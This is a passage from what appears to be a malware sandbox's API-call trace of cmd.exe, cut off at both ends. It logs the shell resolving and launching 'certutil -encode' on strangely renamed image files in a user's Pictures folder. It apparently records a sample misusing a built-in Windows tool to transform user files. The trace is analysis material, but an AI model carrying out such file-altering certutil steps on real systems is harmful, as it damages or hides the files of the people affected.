_wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0294.266] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0294.266] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0294.266] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0294.266] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0294.266] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0294.266] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0294.266] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0294.266] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0294.266] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0294.266] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0294.266] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0294.266] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0294.266] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0294.266] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0294.266] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0294.266] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0294.266] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0294.266] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0294.266] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0294.266] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0294.266] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0294.267] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0294.267] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0294.267] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0294.267] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0294.267] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0294.267] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0294.267] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0294.267] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0294.267] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0294.267] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0294.267] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0294.267] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0294.267] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0294.267] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0294.267] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0294.267] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0294.267] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0294.267] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0294.267] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0294.267] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0294.267] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0294.267] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0294.267] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0294.267] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0294.267] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0294.268] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0294.268] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0294.268] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0294.268] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0294.268] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0294.268] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0294.268] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0294.268] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0294.268] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0294.268] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0294.268] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0294.268] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0294.268] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0294.268] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0294.268] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0294.268] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0294.268] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0294.268] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0294.268] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0294.268] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0294.268] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0294.268] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0294.268] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0294.268] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0294.268] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0294.268] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0294.269] ??_V@YAXPEAX@Z () returned 0x1 [0294.269] GetProcessHeap () returned 0x21ed8c70000 [0294.269] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d32630 [0294.270] GetProcessHeap () returned 0x21ed8c70000 [0294.270] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa6) returned 0x21ed8c7d160 [0294.270] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0294.270] malloc (_Size=0xffce) returned 0x21eda100000 [0294.270] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0294.271] GetProcessHeap () returned 0x21ed8c70000 [0294.271] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8c96f40 [0294.274] SetErrorMode (uMode=0x0) returned 0x0 [0294.274] SetErrorMode (uMode=0x1) returned 0x0 [0294.274] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8c96f50, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0xa6cf4fdb80*="Pictures") returned 0x18 [0294.274] SetErrorMode (uMode=0x0) returned 0x1 [0294.274] GetProcessHeap () returned 0x21ed8c70000 [0294.274] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c96f40, Size=0x54) returned 0x21ed8c96f40 [0294.274] GetProcessHeap () returned 0x21ed8c70000 [0294.274] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c96f40) returned 0x54 [0294.274] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0294.274] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0294.274] GetProcessHeap () returned 0x21ed8c70000 [0294.274] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1be) returned 0x21ed8d64690 [0294.275] GetProcessHeap () returned 0x21ed8c70000 [0294.275] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36c) returned 0x21ed8c7c380 [0294.275] GetProcessHeap () returned 0x21ed8c70000 [0294.275] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7c380, Size=0x1c0) returned 0x21ed8c7c380 [0294.275] GetProcessHeap () returned 0x21ed8c70000 [0294.275] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7c380) returned 0x1c0 [0294.275] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0294.275] GetProcessHeap () returned 0x21ed8c70000 [0294.275] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c7d210 [0294.275] GetProcessHeap () returned 0x21ed8c70000 [0294.275] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d210, Size=0x7e) returned 0x21ed8c7d210 [0294.275] GetProcessHeap () returned 0x21ed8c70000 [0294.275] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d210) returned 0x7e [0294.275] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0294.275] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0294.276] GetLastError () returned 0x2 [0294.276] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0294.276] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0294.277] GetLastError () returned 0x2 [0294.277] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0294.277] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0294.278] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0294.278] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0294.278] GetLastError () returned 0x2 [0294.278] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0294.278] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0294.279] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0294.279] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0294.279] ??_V@YAXPEAX@Z () returned 0x1 [0294.279] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0294.282] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0294.282] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0294.283] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0294.283] GetProcessHeap () returned 0x21ed8c70000 [0294.283] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e30 [0294.283] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0294.283] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0294.283] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0294.283] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0294.283] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0294.283] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0294.283] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0294.283] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0294.283] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0294.283] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0294.283] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0294.283] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0294.283] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0294.283] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0294.284] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0294.285] GetProcessHeap () returned 0x21ed8c70000 [0294.285] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e30) returned 1 [0294.285] GetProcessHeap () returned 0x21ed8c70000 [0294.285] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95520 [0294.285] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0294.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.285] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0294.285] _get_osfhandle (_FileHandle=0) returned 0x4c [0294.286] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0294.286] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"4f lywQbc0ZJ_8b.gif.Sister\" \"4f lywQbc0ZJ_8b.gif.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Pictures", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"4f lywQbc0ZJ_8b.gif.Sister\" \"4f lywQbc0ZJ_8b.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"4f lywQbc0ZJ_8b.gif.Sister\" \"4f lywQbc0ZJ_8b.gif.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x11ec, dwThreadId=0x71c)) returned 1 [0294.307] CloseHandle (hObject=0xa8) returned 1 [0294.307] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0294.307] GetProcessHeap () returned 0x21ed8c70000 [0294.307] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6d110) returned 1 [0294.307] GetEnvironmentStringsW () returned 0x21ed8d603e0* [0294.307] GetProcessHeap () returned 0x21ed8c70000 [0294.307] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8d60f30 [0294.308] FreeEnvironmentStringsA (penv="=") returned 1 [0294.308] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0294.922] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0294.922] CloseHandle (hObject=0xa4) returned 1 [0294.922] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0294.922] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0294.922] GetProcessHeap () returned 0x21ed8c70000 [0294.923] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d60f30) returned 1 [0294.923] GetEnvironmentStringsW () returned 0x21ed8d603e0* [0294.923] GetProcessHeap () returned 0x21ed8c70000 [0294.923] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8d60f30 [0294.923] FreeEnvironmentStringsA (penv="=") returned 1 [0294.923] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0294.923] GetProcessHeap () returned 0x21ed8c70000 [0294.923] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d60f30) returned 1 [0294.923] GetEnvironmentStringsW () returned 0x21ed8d603e0* [0294.923] GetProcessHeap () returned 0x21ed8c70000 [0294.923] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8d60f30 [0294.923] FreeEnvironmentStringsA (penv="=") returned 1 [0294.923] GetProcessHeap () returned 0x21ed8c70000 [0294.923] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95520) returned 1 [0294.924] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0294.924] ??_V@YAXPEAX@Z () returned 0x1 [0294.924] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61adacc0, ftCreationTime.dwHighDateTime=0x1d5e1c0, ftLastAccessTime.dwLowDateTime=0x77878d60, ftLastAccessTime.dwHighDateTime=0x1d5ee34, ftLastWriteTime.dwLowDateTime=0x77878d60, ftLastWriteTime.dwHighDateTime=0x1d5ee34, nFileSizeHigh=0x0, nFileSizeLow=0xfa3, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="CBqE_ptIfCfIXOkQ.gif.Sister", cAlternateFileName="")) returned 1 [0294.925] GetProcessHeap () returned 0x21ed8c70000 [0294.925] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7cb20, Size=0x8c) returned 0x21ed8d65bb0 [0294.925] GetProcessHeap () returned 0x21ed8c70000 [0294.925] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d65bb0) returned 0x8c [0294.925] GetProcessHeap () returned 0x21ed8c70000 [0294.925] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a050 [0294.926] GetProcessHeap () returned 0x21ed8c70000 [0294.926] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a050, Size=0x58) returned 0x21ed937a050 [0294.926] GetProcessHeap () returned 0x21ed8c70000 [0294.926] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a050) returned 0x58 [0294.926] GetProcessHeap () returned 0x21ed8c70000 [0294.926] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937a0c0 [0294.926] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0294.927] GetProcessHeap () returned 0x21ed8c70000 [0294.927] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8c7c110 [0294.927] ??_V@YAXPEAX@Z () returned 0x1 [0294.927] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0294.927] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0294.927] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0294.928] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7ca60 [0294.928] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0294.928] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xda562269, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xda562269, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7cf40 [0294.928] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0294.928] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\CBqE_ptIfCfIXOkQ.gif.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61adacc0, ftCreationTime.dwHighDateTime=0x1d5e1c0, ftLastAccessTime.dwLowDateTime=0x77878d60, ftLastAccessTime.dwHighDateTime=0x1d5ee34, ftLastWriteTime.dwLowDateTime=0x77878d60, ftLastWriteTime.dwHighDateTime=0x1d5ee34, nFileSizeHigh=0x0, nFileSizeLow=0xfa3, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="CBqE_ptIfCfIXOkQ.gif.Sister", cAlternateFileName="CBQE_P~1.SIS")) returned 0x21ed8c7c9a0 [0294.929] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0294.929] _wcsnicmp (_String1="CBQE_P~1.SIS", _String2="CBqE_ptIfCfIXOkQ.gif.Sister", _MaxCount=0x1b) returned 10 [0294.929] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0294.929] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0294.929] GetProcessHeap () returned 0x21ed8c70000 [0294.929] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7be90 [0294.929] ??_V@YAXPEAX@Z () returned 0x1 [0294.929] ??_V@YAXPEAX@Z () returned 0x1 [0294.929] GetProcessHeap () returned 0x21ed8c70000 [0294.929] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a0c0, Size=0x230) returned 0x21ed937a0c0 [0294.929] GetProcessHeap () returned 0x21ed8c70000 [0294.929] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a0c0) returned 0x230 [0294.929] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0294.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.929] GetFileType (hFile=0x50) returned 0x2 [0294.929] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.930] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0294.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.930] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0294.937] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0294.937] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0294.937] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0294.937] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0294.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.937] GetFileType (hFile=0x50) returned 0x2 [0294.938] 